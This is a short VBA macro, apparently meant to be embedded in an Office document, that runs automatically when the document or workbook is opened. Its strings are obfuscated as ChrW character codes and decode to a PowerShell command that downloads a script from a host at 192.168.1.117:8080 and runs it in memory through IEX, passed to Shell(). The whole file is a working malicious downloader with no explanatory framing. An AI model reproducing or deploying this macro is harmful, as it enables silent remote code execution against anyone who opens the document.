Sub Auto_Open()
	Dim dvjMILto As String
	Dim vPpZwuWQ As String
	Dim CZQhfKRd As String
	Dim MHGxPUpd As String
	Dim mbknfCgy As String
	dvjMILto = ChrW(112) & ChrW(111) & ChrW(119) & ChrW(101) & ChrW(114) & ChrW(115) & ChrW(104) & ChrW(101) & ChrW(108) & ChrW(108) & ChrW(46) & ChrW(101) & ChrW(120) & ChrW(101) & ChrW(32) & ChrW(34) & ChrW(34) & ChrW(73) & ChrW(69) & ChrW(88) & ChrW(32) & ChrW(40) & ChrW(40) & ChrW(110) & ChrW(101) & ChrW(119) & ChrW(45) & ChrW(111) & ChrW(98) & ChrW(106) 
	vPpZwuWQ = ChrW(101) & ChrW(99) & ChrW(116) & ChrW(32) & ChrW(110) & ChrW(101) & ChrW(116) & ChrW(46) & ChrW(119) & ChrW(101) & ChrW(98) & ChrW(99) & ChrW(108) & ChrW(105) & ChrW(101) & ChrW(110) & ChrW(116) & ChrW(41) & ChrW(46) & ChrW(100) & ChrW(111) & ChrW(119) & ChrW(110) & ChrW(108) & ChrW(111) & ChrW(97) & ChrW(100) & ChrW(115) & ChrW(116) & ChrW(114) 
	CZQhfKRd = ChrW(105) & ChrW(110) & ChrW(103) & ChrW(40) & ChrW(39) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(58) & ChrW(47) & ChrW(47) & ChrW(49) & ChrW(57) & ChrW(50) & ChrW(46) & ChrW(49) & ChrW(54) & ChrW(56) & ChrW(46) & ChrW(49) & ChrW(46) & ChrW(49) & ChrW(49) & ChrW(55) & ChrW(58) & ChrW(56) & ChrW(48) & ChrW(56) & ChrW(48) 
	MHGxPUpd = ChrW(39) & ChrW(41) & ChrW(41) & ChrW(34) & ChrW(34) 
	mbknfCgy = dvjMILto + vPpZwuWQ + CZQhfKRd + MHGxPUpd
	Shell(mbknfCgy)
End Sub
Sub AutoOpen()
	Auto_Open
End Sub
Sub Workbook_Open()
	Auto_Open
End Sub
